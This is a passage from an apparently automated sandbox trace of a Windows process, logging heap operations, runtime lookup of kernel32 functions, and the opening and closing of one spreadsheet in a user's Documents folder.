hHeap=0x770000) returned 1 [0032.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.798] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cdf0 [0032.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cdf0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.798] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0032.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdf0 [0032.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cdf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.799] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0032.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0032.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x36) returned 0x7c2080 [0032.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", cchWideChar=54, lpMultiByteStr=0x7c2080, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", lpUsedDefaultChar=0x0) returned 54 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.799] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7hwynz2k.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c) returned 0x7db378 [0032.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=54, lpWideCharStr=0x7db378, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx") returned 54 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0032.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.801] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.803] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0032.803] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.804] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.805] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0032.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8899b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.805] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0032.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0032.805] CloseHandle (hObject=0x128) returned 1 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.805] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.805] HeapFree (in: hHeap=0x770000, 